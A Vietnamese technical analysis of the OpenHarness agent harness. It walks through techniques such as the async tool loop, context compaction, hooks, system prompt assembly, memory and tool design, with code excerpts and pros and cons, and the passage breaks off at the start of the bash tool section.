HKUDS/OpenHarness — Nghiên cứu sâu các kỹ thuật Harness
ohmo personal agent tích hợp Feishu/Slack/Telegram/Discord. 30 kỹ thuật, kèm code thật từ repo, pros/cons và bài viết tham khảo.1. Tổng quan OpenHarness Intro
HKUDS/OpenHarness là một implementation Python
open-source mô phỏng (và mở rộng) kiến trúc của Claude Code.
Self-description ngắn trong pyproject.toml: "Open-source
Python port of Claude Code - an AI-powered CLI coding assistant". Repo
publish hai CLI chính:
openharness/oh/openh cho coding
agent, và ohmo cho personal agent tích hợp messaging.
Báo cáo này phân tích harness của OpenHarness — các lớp "scaffolding" xoay quanh LLM call để biến một model trần thành một coding agent có thể chạy trong terminal, điều phối subagents, xử lý channel messaging, và tự động chạy CI. Scope gồm 7 chủ đề với 15+ subsystem:
engine/— agent loop (query.py805 LOC), stream events, cost trackertools/— 42 tools (Bash, Read, Edit, Grep, WebFetch, Task...) + Pydantic basepermissions/— 3-mode checker, sensitive path protection, path ruleshooks/,plugins/,skills/,mcp/— 4 extension surfacesmemory/,prompts/— per-project memory + multi-layer system promptswarm/,coordinator/— subprocess multi-agent với git worktree + mailbox (unique vs opencode)channels/,services/,sandbox/,tasks/,autopilot/— Slack/Feishu/Telegram/Discord bus, LSP AST, Docker sandbox, cron, repo autopilot (unique vs opencode)
Harness là gì?
Cộng đồng coding-agent đang dần dùng thuật ngữ "harness" như một shorthand cho tất cả những gì không phải model — tức là: Agent = Model + Harness. Harness engineering là subset của context engineering, xoay quanh việc quản lý context window, tool orchestration, state persistence, error recovery, verification, safety, và lifecycle.
Kiến trúc tổng thể
Tech stack
| Layer | Công nghệ | Ghi chú |
|---|---|---|
| Runtime | Python ≥3.10 | asyncio toàn bộ, Pydantic v2 strict |
| Language | Python | mypy strict, ruff lint (line 100) |
| AI SDKs | Anthropic ≥0.40 + OpenAI ≥1.0 | Provider abstraction qua api_client |
| CLI | Typer ≥0.12 | Subcommand layout |
| TUI | Rich + Textual ≥0.80 + React Ink | Dual TUI: Python native + React-based |
| Validation | Pydantic v2 | Tool input models sinh JSON schema |
| HTTP | httpx ≥0.27 + websockets ≥12 | Async; Feishu WebSocket long-connection |
| MCP | mcp ≥1.0 (Python SDK) | stdio + HTTP transport |
| Channels | slack-sdk, discord.py, python-telegram-bot, lark-oapi | 4 bot SDKs first-class |
| Cron | croniter ≥2.0 + watchfiles | Persistent job scheduler |
| Sandbox | Docker SDK (optional) | Tool execution isolation |
Bảng tóm tắt 30 kỹ thuật
| ID | Kỹ thuật | Theme |
|---|---|---|
| T1 | Async ReAct + branching single/parallel tool execution | Loop |
| T2 | Auto-compact before-turn + reactive on overflow | Loop |
| T3 | Stream events union + CompactProgressEvent 9-phase | Loop |
| T4 | Pre/Post tool hook interception | Loop |
| T5 | Tool metadata carryover across turns | Loop |
| T6 | Multi-layer system prompt assembly (9 sections) | Context |
| T7 | CLAUDE.md cascading discovery upward | Context |
| T8 | Per-project memory isolation (SHA1 hash) | Context |
| T9 | Token-based memory search + CJK tokenizer | Context |
| T10 | Pydantic tool base + auto JSON schema | Tool |
| T11 | Per-tool output truncation + UTF-8 normalization | Tool |
| T12 | Bash interactive preflight + PTY + graceful timeout | Tool |
| T13 | Ripgrep-first Glob/Grep + Python fallback | Tool |
| T14 | Markdown skill system + frontmatter | Ecosystem |
| T15 | Hook lifecycle (6 events · 4 types · hot reload) | Ecosystem |
| T16 | Plugin manifest-based loading | Ecosystem |
| T17 | MCP stdio + HTTP + dynamic Pydantic adapter | Ecosystem |
| T18 | 3-mode permission (DEFAULT / PLAN / FULL_AUTO) | Permission |
| T19 | Built-in sensitive path protection (hardcoded glob) | Permission |
| T20 | 6-layer hierarchical permission evaluation | Permission |
| T21 | Async interactive approval + UUID + 300s timeout | Permission |
| T22 | Subprocess-based subagent spawning | Swarm ★ |
| T23 | File-based async mailbox với atomic writes | Swarm ★ |
| T24 | Dual-channel permission sync protocol | Swarm ★ |
| T25 | Git worktree isolation per agent | Swarm ★ |
| T26 | YAML agent definitions + coordinator | Swarm ★ |
| T27 | Multi-channel bus (Slack/Feishu/Discord/Telegram/Matrix) | Integrations ★ |
| T28 | LSP-based code intelligence via Python AST | Integrations ★ |
| T29 | Docker sandbox cho tool execution | Integrations ★ |
| T30 | Cron scheduler + persistent background tasks | Integrations ★ |
★ = feature chỉ có ở OpenHarness (không có ở opencode core). Tổng: 9 kỹ thuật unique, 21 kỹ thuật chia sẻ chung ý tưởng với opencode/Claude Code nhưng implement theo Python idiom.
A. Agent Loop & Streaming 5 kỹ thuật
Engine là trung tâm harness của OpenHarness: file
engine/query.py (805 LOC) chứa coroutine run_query
— một async generator emit stream events cho UI. Điểm thú vị: loop branch
giữa sequential (1 tool) và parallel (2+ tool via
asyncio.gather), auto-compact ngay trước mỗi turn, pre/post
tool hook intercept, và carryover tool metadata qua nhiều lần compact.
T1. Async ReAct loop với single/parallel tool branching
A.1src/openharness/engine/query.py · Hàm: run_query() · Lines: 516–651Code từ OpenHarness
turn_count
= 0 while
context.max_turns is None or turn_count < context.max_turns: turn_count +=
1 # --- auto-compact check
before calling the model --------------- async
for event, usage in
_stream_compaction(trigger="auto"): yield event, usage messages, was_compacted =
last_compaction_result final_message: ConversationMessage | None = None async for event in
context.api_client.stream_message( ApiMessageRequest(model=context.model,
messages=messages, system_prompt=context.system_prompt,
tools=context.tool_registry.to_api_schema()): if
isinstance(event, ApiTextDeltaEvent): yield
AssistantTextDelta(text=event.text), None elif isinstance(event, ApiMessageCompleteEvent):
final_message = event.message if not
final_message.tool_uses: return # natural end of turn tool_calls =
final_message.tool_uses if len(tool_calls) ==
1: # Single tool: sequential
(stream events immediately) tc = tool_calls[0] yield
ToolExecutionStarted(tool_name=tc.name, tool_input=tc.input), None result = await
_execute_tool_call(context, tc.name, tc.id, tc.input) yield ToolExecutionCompleted(tool_name=tc.name,
output=result.content, is_error=result.is_error), None tool_results = [result] else: # Multiple tools: execute
concurrently, emit events after for tc
in tool_calls: yield
ToolExecutionStarted(tool_name=tc.name, tool_input=tc.input), None # return_exceptions=True tránh
orphan tool_use blocks raw_results = await
asyncio.gather( *[_run(tc) for tc in tool_calls], return_exceptions=True ) # wrap exceptions thành
ToolResultBlock(is_error=True) ...
messages.append(ConversationMessage(role="user",
content=tool_results)) asyncio.gather để giảm
latency. Quan trọng nhất là return_exceptions=True: nếu một
tool raise, các tool khác không bị cancelled. Lý do được comment
rất kỹ: Anthropic API reject request tiếp theo nếu có bất kỳ
tool_use nào thiếu tool_result tương ứng.Code example (generic)
async
def run_agent_turn(messages, tools): resp =
await llm.call(messages, tools) if not resp.tool_uses: return
resp if len(resp.tool_uses) == 1: tc = resp.tool_uses[0]
results = [await exec_tool(tc)] else: # CRITICAL:
return_exceptions=True # otherwise failed tool
leaves siblings cancelled # → orphan tool_use
blocks → next API call rejected raw = await
asyncio.gather( *[exec_tool(tc) for tc in resp.tool_uses], return_exceptions=True, ) results = [wrap_exception(tc, r) for tc, r in zip(resp.tool_uses,
raw)] messages.append({"role": "user", "content": results})
return results
Ưu điểm
- Parallel giảm latency khi nhiều tool độc lập (Read 3 files cùng lúc)
- Single path vẫn stream event realtime — UX không bị delay
return_exceptions=Truebảo vệ khỏi orphan tool_use bug- async-native, không cần thread pool
Nhược điểm
- Parallel race condition nếu tool cùng sửa file — không enforce ordering
- Unbounded concurrency khi nhiều tool call → overload disk/API
- Ẩn side effect khó debug khi tool đan xen
- Không có mechanism cancel/timeout toàn turn như opencode Effect.Stream
T2. Auto-compact before-turn + reactive on overflow
A.2src/openharness/engine/query.py · Lines: 519–562 · Service: services/compact/ · Hằng: AUTOCOMPACT_BUFFER_TOKENS = 13_000Code từ OpenHarness
# 1. Before-turn
auto-compact async for event, usage in _stream_compaction(trigger="auto"): yield event, usage
messages, was_compacted = last_compaction_result # 2.
Reactive compact khi provider trả prompt-too-long except Exception as exc:
error_msg = str(exc) if not
reactive_compact_attempted and
_is_prompt_too_long_error(exc): reactive_compact_attempted = True yield
StatusEvent(message=REACTIVE_COMPACT_STATUS_MESSAGE), None async for event, usage
in _stream_compaction(trigger="reactive", force=True): yield event, usage messages, was_compacted =
last_compaction_result if was_compacted: continue # retry turn với messages đã
compact # 3. services/compact/microcompact.py —
cheap, fast first pass # Drop stale
ToolResultBlock content (keep tool_use structure) # 4. services/compact/summary.py — LLM summarize khi
microcompact không đủ # 5.
services/compact/ptl_retry.py — truncate_head_for_ptl_retry() # last-chance cắt head khi reactive vẫn
overflow Code example (generic)
class CompactionOrchestrator:
async def maybe_compact(self, messages, trigger="auto"): estimate =
self.token_counter.estimate(messages) if estimate
< self.threshold: return messages, False # Phase 1: cheap — drop old
ToolResultBlock content only pruned = self.microcompact(messages)
if self.token_counter.estimate(pruned) <
self.threshold: return pruned, True # Phase 2: expensive — LLM
summarize summary = await
self.llm_summarize(pruned) return [system_prompt,
summary] + pruned[-5:], True async def run_turn(self, messages): messages, _ = await self.maybe_compact(messages) try: return await
llm.call(messages) except PromptTooLongError:
messages, _ = await self.maybe_compact(messages,
trigger="reactive") return
await llm.call(messages) # one
retry
Ưu điểm
- Ba-tầng graceful — rẻ trước, đắt sau
- Session dài tự survive mà không cần user can thiệp
- Reactive fallback nếu token estimate sai
- Event progress để UI show đang compact
Nhược điểm
- LLM summary rủi ro mất thông tin quan trọng
- 13k buffer arbitrary — không tune theo model
- Truncate head có thể xóa system hint / CLAUDE.md context
- Khi reactive fail lần 2, agent die (không có fallback thứ 3)
T3. Streaming events union + CompactProgressEvent 9-phase
A.3src/openharness/engine/stream_events.py · Lines: toàn bộ fileCode từ OpenHarness
from dataclasses
import dataclass from typing import
Literal, Union # 7 event types yielded from
run_query() @dataclass(frozen=True) class AssistantTextDelta:
text: str @dataclass(frozen=True) class AssistantTurnComplete:
message: ConversationMessage; usage: UsageSnapshot @dataclass(frozen=True) class
ToolExecutionStarted: tool_name: str;
tool_input: dict @dataclass(frozen=True) class ToolExecutionCompleted:
tool_name: str; output: object; is_error: bool @dataclass(frozen=True) class
StatusEvent: message: str @dataclass(frozen=True) class
ErrorEvent: message: str @dataclass(frozen=True) class
CompactProgressEvent: phase: Literal[ "hooks_start", "context_collapse_start", "context_collapse_end", "session_memory_start", "session_memory_end", "compact_start", "compact_retry", "compact_end", "compact_failed", ] message: str StreamEvent = Union[
AssistantTextDelta, AssistantTurnComplete, ToolExecutionStarted,
ToolExecutionCompleted, StatusEvent, ErrorEvent, CompactProgressEvent,
] dict[str, Any], OpenHarness dùng tagged
union với @dataclass(frozen=True). UI bên Rich/Textual
pattern-match bằng isinstance() cho từng event type — mypy
strict đảm bảo không bỏ sót case. Event đặc biệt nhất là
CompactProgressEvent với 9 phase: UI hiện progress bar chi
tiết (đang collapse context → đang save memory → đang summarize →
done/fail) thay vì chỉ "compacting...". Mức độ observability này trong bản
port Python rất hiếm.Code example (generic)
from typing import Union, Literal from dataclasses import dataclass @dataclass(frozen=True) class
TextDelta: text: str @dataclass(frozen=True) class
ToolStart: tool: str; input: dict @dataclass(frozen=True) class
ToolEnd: tool: str; output: str; error: bool
Event = Union[TextDelta, ToolStart, ToolEnd] async
def render_events(gen): async for ev in gen: match ev:
case TextDelta(text): console.print(text,
end="") case
ToolStart(tool, _): ui.mark_tool(tool, "running")
case ToolEnd(tool, _, error): ui.mark_tool(tool,
"error" if error else "done")
Ưu điểm
- Type-safe: mypy strict bắt bỏ sót case
- UI logic tách rời khỏi engine
- CompactProgressEvent 9-phase → UX chi tiết lúc compact
- Dễ serialize sang JSON cho remote UI
Nhược điểm
- Thêm event type cần cập nhật nhiều chỗ (engine + UI + tests)
- Frozen dataclass immutable → không "accumulate" được (phải tạo object mới mỗi delta)
- Không có ID liên kết parent-child event (tool_start ↔ tool_end phải match bằng tool_name)
T4. Pre/Post tool hook interception
A.4src/openharness/engine/query.py · Hàm: _execute_tool_call() · Lines: 654–720Code từ OpenHarness
async def
_execute_tool_call( context: QueryContext,
tool_name: str, tool_use_id: str, tool_input: dict[str, object], ) ->
ToolResultBlock: # ---- PRE_TOOL_USE hook ----
if context.hook_executor is not
None: pre_hooks = await
context.hook_executor.execute( HookEvent.PRE_TOOL_USE, {"tool_name": tool_name, "tool_input": tool_input, "event": HookEvent.PRE_TOOL_USE.value}, ) if pre_hooks.blocked: return
ToolResultBlock( tool_use_id=tool_use_id, content=pre_hooks.reason or f"pre_tool_use hook blocked {tool_name}", is_error=True, ) # ---- Actual tool execution
---- result = await
context.tool_registry.execute(tool_name, tool_input, ...) # ---- POST_TOOL_USE hook (observation only, cannot block)
---- if context.hook_executor is not None: await
context.hook_executor.execute( HookEvent.POST_TOOL_USE, {"tool_name": tool_name, "tool_input": tool_input, "tool_result": result.content, "is_error": result.is_error}, ) return result git push sau
6pm, log bash vào SIEM, validate Edit pattern. PRE hook có thể
blocked=True → short-circuit thành ToolResultBlock error (LLM
thấy như tool fail bình thường, tự điều chỉnh). POST hook chỉ observe —
không thể undo execution đã xong. Thiết kế này giống Claude Code hooks
(tham chiếu code.claude.com/docs/en/hooks).Code example (generic)
class HookExecutor: async def execute(self, event: HookEvent, payload: dict) ->
HookResult: blocked = False; reason = None for hook in self.hooks.get(event, []): res = await hook.run(payload) if
res.blocked: blocked = True; reason = res.reason;
break return
HookResult(blocked=blocked, reason=reason) # Usage
inside tool execution async def run_tool(name, args): pre = await hooks.execute(HookEvent.PRE_TOOL_USE, {"tool_name": name, "args":
args}) if pre.blocked: return {"error": pre.reason
or "blocked by hook"}
result = await tool.execute(args) await hooks.execute(HookEvent.POST_TOOL_USE, {"tool_name": name, "result":
result}) return result
Ưu điểm
- Policy tách khỏi permission system — hai layer bảo vệ
- PRE có thể block; POST có thể audit/log
- Hot-reload hooks qua
HookReloaderwatch mtime - Shell/Prompt/HTTP/Agent types — đa dạng
Nhược điểm
- Hook chạy sync trong hot path → latency mỗi tool
- Prompt hook gọi LLM → cost + race với main loop
- Không có "retry with modified args" — chỉ block or pass
- Hook mis-config có thể làm agent stuck mà khó debug
T5. Tool metadata carryover across turns
A.5src/openharness/engine/query.py · Lines: 146–250 · Struct: QueryContext (deque-based tracking)Code từ OpenHarness
from collections
import deque @dataclass class QueryContext: # Recent work tracking — persisted across compaction
rounds recent_goals: deque[str] = field(default_factory=lambda: deque(maxlen=5))
recent_reads: deque[str] = field(default_factory=lambda: deque(maxlen=6))
active_artifacts: deque[str] = field(default_factory=lambda: deque(maxlen=8))
async_agent_tasks: deque[AgentTaskRef] = field(default_factory=lambda: deque(maxlen=12))
work_log: deque[WorkLogEntry] = field(default_factory=lambda: deque(maxlen=10)) ...
# Updated on every ToolExecutionCompleted: def record_tool_execution(ctx:
QueryContext, tc: ToolUseBlock, result: ToolResultBlock): if tc.name == "Read": path =
tc.input.get("file_path") if path: ctx.recent_reads.append(path) elif tc.name == "Write" or tc.name == "Edit": path =
tc.input.get("file_path") if path: ctx.active_artifacts.append(path) elif tc.name == "Task":
ctx.async_agent_tasks.append(AgentTaskRef(id=..., status="pending"))
ctx.work_log.append(WorkLogEntry(tool=tc.name, ts=time.time(), ok=not result.is_error)) # When compact
happens, these deques get injected into summary: # "Recently read: path1, path2, ..." # "Active artifacts: draft.md, report.html, ..." # "Pending subagents: task-abc (status=running),
..." maxlen nhỏ (5, 6, 8, 10, 12) →
bounded, không tự overflow.Code example (generic)
from collections import deque class AgentMemory: def __init__(self):
self.recent_goals = deque(maxlen=5)
self.recent_reads = deque(maxlen=6)
self.pending_tasks = deque(maxlen=12) def on_tool(self, name, args,
ok): if name == "Read":
self.recent_reads.append(args["file_path"]) elif name == "Task":
self.pending_tasks.append(args["id"]) def summary_block(self) ->
str: return ( f"Recent files read: {', '.join(self.recent_reads)}\n"
f"Active artifacts: {',
'.join(self.active_artifacts)}\n" f"Pending subagents: {', '.join(self.pending_tasks)}" )
# Inject into compact summary prompt: compact_msg
= f"Previous conversation summary:
...\n\n{memory.summary_block()}"
Ưu điểm
- Giảm "amnesia" sau compact
- Bounded deque → predictable memory
- Metadata structural → easy to render in UI
- Có thể inject vào system prompt mỗi turn (không chỉ khi compact)
Nhược điểm
- Tracking logic hard-code theo từng tool — cần update khi thêm tool
- Không có "why" chỉ có "what" — agent biết đọc X nhưng không nhớ lý do
- Deque maxlen arbitrary — session rất dài vẫn overflow
- Có thể trùng lặp info với LLM-generated summary
B. Context & Memory 4 kỹ thuật
OpenHarness tách context thành 3 lớp: (1) system prompt
— assemble động mỗi turn từ 9 section; (2) CLAUDE.md —
rules local theo project, cascade từ cwd lên root; (3) persistent
memory — file-based note per-project, được search theo query hiện
tại. Điểm khác opencode: OpenHarness có long-term memory store
riêng (MEMORY.md) trong khi opencode chỉ dựa
AGENTS.md/CLAUDE.md.
T6. Multi-layer system prompt assembly (9 sections)
B.1src/openharness/prompts/context.py · Hàm: build_system_prompt() · Lines: 74–158Code từ OpenHarness
def build_system_prompt(ctx: PromptContext) -> str:
sections: list[str] = [] # 1. Base role — persona +
operating principles sections.append(BASE_PROMPT) # 2. Environment — cwd, platform, python, git branch,
model sections.append(_build_env_section(ctx)) #
3. Effort + reasoning passes (thinking mode hint) if ctx.effort:
sections.append(_build_effort_section(ctx.effort, ctx.passes)) # 4. Skills — discovered skills injected như
"tools-of-tools" if ctx.skills:
sections.append(_build_skills_section(ctx.skills)) # 5.
Delegation — khi có subagents if
ctx.subagent_definitions:
sections.append(_build_delegation_section(ctx.subagent_definitions)) # 6. CLAUDE.md — cascading from cwd to root if ctx.claudemd_content: sections.append(f"# Local project rules
(CLAUDE.md)\n{ctx.claudemd_content}") # 7. Local
rules (.claude/rules/*.md) if
ctx.local_rules: sections.append(_build_local_rules(ctx.local_rules))
# 8. Issue/PR context (khi chạy trong GitHub
autopilot) if ctx.issue_or_pr:
sections.append(_build_issue_section(ctx.issue_or_pr)) #
9. Relevant memories (top-k from memory search) if ctx.relevant_memories:
sections.append(_build_memories_section(ctx.relevant_memories)) return "\n\n---\n\n".join(sections) ctx.claudemd_content đổi → prompt đổi. Khi memory
search hit mới → memories section khác. Cache-aware: các section ổn định
(1-5) ở đầu, section dễ thay đổi (6-9) ở cuối → Anthropic prefix caching
vẫn hit cho phần đầu, chỉ invalidate phần cuối.Code example (generic)
@dataclass class PromptContext: cwd:
Path; model: str; effort: str | None
claudemd_content: str | None subagent_definitions:
list[AgentDef] relevant_memories: list[MemoryHeader] def build_system_prompt(ctx:
PromptContext) -> str: parts = [ BASE_ROLE, # 1.
stable build_env(ctx), # 2. stable per
session build_effort(ctx.effort), # 3. stable per
mode build_subagents(ctx.subagent_definitions), #
4. stable build_claudemd(ctx.claudemd_content), #
5. changes when cwd changes build_memories(ctx.relevant_memories),
# 6. changes every turn ] return "\n\n---\n\n".join(p
for p in parts if p)
Ưu điểm
- Modular — mỗi section có thể test độc lập
- Cache-aware ordering (stable đầu, dynamic cuối)
- Điều kiện rõ ràng — skip section khi không có data
- Delimiter
---giúp LLM parse section boundaries
Nhược điểm
- 9 section → system prompt có thể rất dài (10k+ token)
- Rebuild mỗi turn → prompt caching fragile nếu cache key không stable
- Không có token budget per section — dễ dominate bởi CLAUDE.md lớn
- Thứ tự section hard-code, khó customize
T7. CLAUDE.md cascading discovery upward
B.2src/openharness/prompts/claudemd.py · Hàm: discover_claudemd() · Lines: 8–48 · Truncate: 12000 chars/fileCode từ OpenHarness
def discover_claudemd(cwd: Path, *, max_chars: int = 12000) -> str: collected: list[tuple[Path, str]] =
[] seen: set[Path] = set() # Walk upward from cwd to
filesystem root current = cwd.resolve() while
True: for candidate in ( current / "CLAUDE.md",
current / ".claude" / "CLAUDE.md", ): if
candidate.exists() and candidate not in seen: seen.add(candidate) content =
candidate.read_text(encoding="utf-8",
errors="replace") if
len(content) > max_chars: content = content[:max_chars] + f"\n\n... [truncated at {max_chars}
chars]" collected.append((candidate, content)) #
Also collect .claude/rules/*.md at each level rules_dir = current /
".claude" / "rules"
if rules_dir.is_dir(): for
rule in sorted(rules_dir.glob("*.md")): if rule not in seen: seen.add(rule) collected.append((rule,
rule.read_text(...))) if current.parent ==
current: break # reached
root current = current.parent # Reverse so
root-level rules come first, leaf rules last (last wins)
collected.reverse() return "\n\n".join(f"## {p.relative_to(cwd) if ...}\n\n{c}" for p, c in
collected) Code example (generic)
def find_up(cwd: Path, filenames: list[str]) ->
list[Path]: """Walk upward from cwd to root, collecting
matching files.""" found, seen = [], set()
current = cwd.resolve() while True: for name in filenames: p =
current / name if p.exists() and p not in seen: seen.add(p);
found.append(p) if current.parent == current:
break current = current.parent return found def assemble_rules(cwd: Path) -> str: files =
find_up(cwd, ["CLAUDE.md", ".claude/CLAUDE.md", "AGENTS.md"]) # Root-first so leaf
overrides (last-wins) files.reverse() return "\n\n".join(f.read_text()[:12000] for f in files)
Ưu điểm
- Monorepo-friendly — rule theo sub-package
- Dedup by path — CLAUDE.md + .claude/CLAUDE.md không trùng
- Truncate per file → predictable size
- Last-wins giống .gitignore — mental model quen thuộc
Nhược điểm
- Walk đến root có thể đọc file ngoài dự án (home dir)
- Không merge semantic — chỉ concat
- Truncate cắt giữa câu, có thể corrupt markdown
- Không tôn trọng .gitignore cho rules dir
T8. Per-project memory isolation với SHA1 hash
B.3src/openharness/memory/paths.py · Hàm: get_project_memory_dir() · Lines: 11–22Code từ OpenHarness
from
hashlib import sha1 from
pathlib import Path from
openharness.config.paths import get_data_dir def get_project_memory_dir(cwd:
str | Path) -> Path: """Return the persistent memory
directory for a project.""" path = Path(cwd).resolve() digest =
sha1(str(path).encode("utf-8")).hexdigest()[:12]
memory_dir = get_data_dir() / "memory" / f"{path.name}-{digest}"
memory_dir.mkdir(parents=True, exist_ok=True) return memory_dir def get_memory_entrypoint(cwd:
str | Path) -> Path: """Return the project memory
entrypoint file.""" return
get_project_memory_dir(cwd) / "MEMORY.md" # Result:
~/.openharness/memory/{project-name}-{sha1[:12]}/ # ├── MEMORY.md ← entrypoint (index) # ├── architecture.md ← topic memory # ├── api-design.md # └──
... app)
ở path khác nhau sẽ không trộn memory. SHA1 của absolute path → unique
nhưng vẫn readable vì tên dir chứa cả path.name. File-based
(không DB) → portable, user có thể backup/copy/inspect bằng tay. MEMORY.md
là index file — các topic khác link vào từ đó (giống Obsidian
vault).Code example (generic)
from hashlib import sha1 from pathlib import Path def project_memory_dir(cwd:
Path, data_root: Path) -> Path: """Stable,
collision-resistant dir per project path.""" abs_path =
cwd.resolve() digest = sha1(str(abs_path).encode()).hexdigest()[:12] d = data_root / "memory" /
f"{abs_path.name}-{digest}" d.mkdir(parents=True, exist_ok=True) return d # Usage mem_dir =
project_memory_dir(Path.cwd(), Path.home() / ".myagent") # →
~/.myagent/memory/app-a3f8b7c1d2e5/
Ưu điểm
- Zero collision giữa các project cùng tên
- Readable — dir có chứa tên project
- File-based → backup/version trivial
- Lazy mkdir — không tạo until needed
Nhược điểm
- Đổi path dự án (mv /a → /b) → memory "mất" vì hash đổi
- SHA1 không cần crypto-strength ở đây nhưng chọn để đơn giản — dev mới có thể nghĩ "ai tấn công?"
- 12 chars digest có thể collide (1 trong ~10^14) trên hệ rất lớn
- Dir tên project có thể lộ info nhạy cảm
T9. Token-based memory search với CJK support
B.4src/openharness/memory/search.py · Hàm: find_relevant_memories() · Lines: 12–49Code từ OpenHarness
def find_relevant_memories(query: str, cwd, *,
max_results=5) -> list[MemoryHeader]: tokens =
_tokenize(query) if not tokens: return [] scored: list[tuple[float, MemoryHeader]] = []
for header in
scan_memory_files(cwd, max_files=100): meta =
f"{header.title}
{header.description}".lower() body = header.body_preview.lower()
# Metadata matches weighted 2x; body matches 1x.
meta_hits = sum(1 for t in tokens if t in meta) body_hits = sum(1 for t in tokens if t in body) score = meta_hits
* 2.0 + body_hits if
score > 0: scored.append((score, header))
# Rank by score desc, then recency desc
(tie-break) scored.sort(key=lambda item:
(-item[0], -item[1].modified_at)) return [header
for _, header in
scored[:max_results]] def _tokenize(text: str) -> set[str]: """Extract search tokens, handling ASCII + Han
ideographs.""" # ASCII word tokens (3+ chars) —
filter out stopwords like "the" ascii_tokens = {t for t in re.findall(r"[A-Za-z0-9_]+", text.lower())
if len(t) >= 3} # Han ideographs (each character carries independent
meaning) han_chars = set(re.findall(r"[\u4e00-\u9fff\u3400-\u4dbf]", text)) return ascii_tokens | han_chars Code example (generic)
import re def tokenize(text: str) -> set[str]: ascii_tok = {t for t
in re.findall(r"\w+", text.lower()) if len(t)
>= 3} han_tok = set(re.findall(r"[\u4e00-\u9fff]", text)) return ascii_tok | han_tok def
rank_memories(query: str, memories, k=5): q_tokens = tokenize(query) scored = [] for m in memories: meta_hits =
sum(1 for t in q_tokens if t in m.meta.lower())
body_hits = sum(1 for t in q_tokens if t in m.body.lower()) score =
meta_hits * 2.0 + body_hits if score: scored.append((score, m.modified_at, m))
scored.sort(key=lambda t: (-t[0], -t[1])) return [m for _, _, m in scored[:k]]
Ưu điểm
- Zero infra (không cần embedding service)
- CJK-aware — Tiếng Trung/Nhật/Hàn work out-of-box
- Metadata weighting thưởng memory có annotation tốt
- Recency tie-break — memory mới ưu tiên
Nhược điểm
- Không hiểu semantic (synonym, translation)
- Max 100 files scanned — scale kém
- Stopword filter đơn giản (chỉ length ≥3)
- Vietnamese không tokenize đúng nếu có dấu
C. Tool Design 4 kỹ thuật
OpenHarness có 42 tools (tools/ folder, một file per tool).
Base class Pydantic đảm bảo type-safety và auto-generate JSON schema cho
Anthropic/OpenAI SDK. Mỗi tool có truncation giới hạn riêng, bash được bảo
vệ bằng preflight + PTY, Glob/Grep ưu tiên ripgrep.
T10. Pydantic tool base + auto JSON schema
C.1src/openharness/tools/base.py · Lines: 30–52Code từ OpenHarness
from abc
import ABC, abstractmethod from
typing import ClassVar from pydantic import BaseModel class BaseTool(ABC): name: ClassVar[str] description:
ClassVar[str] input_model: ClassVar[type[BaseModel]] is_read_only:
ClassVar[bool] = False @classmethod def to_schema(cls) -> dict: """JSON
Schema auto-generated from Pydantic input model.""" return { "name": cls.name,
"description": cls.description, "input_schema": cls.input_model.model_json_schema(), }
@abstractmethod async def
execute(self, args: BaseModel, ctx: ToolContext)
-> ToolResult: """Execute tool with validated args;
return result or error.""" ... # Concrete
usage class ReadInput(BaseModel): file_path: str offset: int |
None = None limit: int |
None = None class ReadTool(BaseTool): name
= "Read" description = "Read a
file..." input_model = ReadInput is_read_only = True async def execute(self, args: ReadInput, ctx) -> ToolResult:
... is_read_only đặc biệt
quan trọng: permission checker dùng nó để quyết định có cần confirm hay
không (read tool luôn OK trong DEFAULT mode).Code example (generic)
from pydantic import BaseModel, Field from abc
import ABC, abstractmethod class BaseTool(ABC): name:
str input_model: type[BaseModel] @classmethod
def schema(cls): return {"name": cls.name, "input_schema": cls.input_model.model_json_schema()}
@abstractmethod async def
execute(self, args: BaseModel) -> dict: ... class GrepInput(BaseModel): pattern: str = Field(description="regex
pattern") path: str | None = None class GrepTool(BaseTool): name
= "Grep" input_model = GrepInput async def execute(self, args:
GrepInput): return await
run_ripgrep(args.pattern, args.path)
Ưu điểm
- Single-source-of-truth schema (model_json_schema)
- Validation errors có chất lượng cao của Pydantic
- mypy strict chấp nhận mọi path
- Field descriptions vào docstring LLM-readable
Nhược điểm
- Pydantic v2 còn đầu jump từ v1 (breaking changes)
- JSON schema đôi khi generate quá phức tạp (Union types), confuse model
- Không có cơ chế
description_templatenhư opencode .txt - Overhead minor cho mỗi validation call
T11. Per-tool output truncation + UTF-8 normalization
C.2tools/bash_tool.py L129 · tools/web_fetch_tool.py L61 · tools/file_read_tool.py L57 · Limits: bash 12KB, web 50KB, file 200 lines defaultCode từ OpenHarness
#
tools/bash_tool.py MAX_BASH_OUTPUT_BYTES = 12 * 1024 #
12KB def _truncate_output(raw: bytes, limit: int =
MAX_BASH_OUTPUT_BYTES) -> str: # 1. Decode UTF-8 with
replace policy (never raise on bad bytes) text = raw.decode("utf-8", errors="replace")
if len(text) <= limit: return text # 2. Keep head + tail,
drop middle with clear marker half = limit // 2 return ( text[:half] + f"\n\n... [output truncated:
{len(text) - limit} bytes omitted] ...\n\n" + text[-half:] ) # tools/web_fetch_tool.py MAX_WEB_FETCH_BYTES = 50 * 1024 #
50KB — web pages can be larger #
tools/file_read_tool.py — different strategy: line-based not
byte-based DEFAULT_READ_LIMIT = 200 # lines MAX_LINE_LENGTH = 2000
# truncate long lines def
_read_with_limits(path: Path, offset: int, limit:
int) -> str: lines = [] with path.open("r", encoding="utf-8",
errors="replace") as f:
for i, line in
enumerate(f): if i < offset: continue if i >= offset +
limit: break if len(line)
> MAX_LINE_LENGTH: line = line[:MAX_LINE_LENGTH] + "... [line truncated]\n" lines.append(f"{i+1}\t{line}") return "".join(lines) errors="replace" bất biến — không bao giờ raise
UnicodeDecodeError giữa stream (phòng khi binary file lẫn vào
input).Code example (generic)
def truncate_mid(text: str,
limit: int) -> str: if len(text) <= limit:
return text half = limit // 2 dropped = len(text) - limit return text[:half] + f"\n... [{dropped} chars truncated] ...\n" +
text[-half:] def safe_decode(raw: bytes) -> str: return raw.decode("utf-8",
errors="replace") # Per-tool
policy LIMITS = {"Bash": 12*1024, "WebFetch": 50*1024, "Read": 200} # line count for
Read
Ưu điểm
- Prevent context bomb from single tool call
- Per-tool tuning — code reading khác build log
- UTF-8 replace → never crash trên binary
- Head+tail cho bash — error thường ở cuối, command ở đầu
Nhược điểm
- 12KB cho bash có thể cắt ngay giữa JSON object
- Không có "spill to file" như opencode (truncate → file path)
- Limit hardcoded — không config per session
- Line-based cho Read kém khi file 1 dòng siêu dài
T12. Bash interactive preflight + PTY + graceful timeout
C.3src/openharness/tools/bash_tool.py · Lines: 145–208 · Timeout: 600s · Terminate grace: 2sCode từ OpenHarness
import
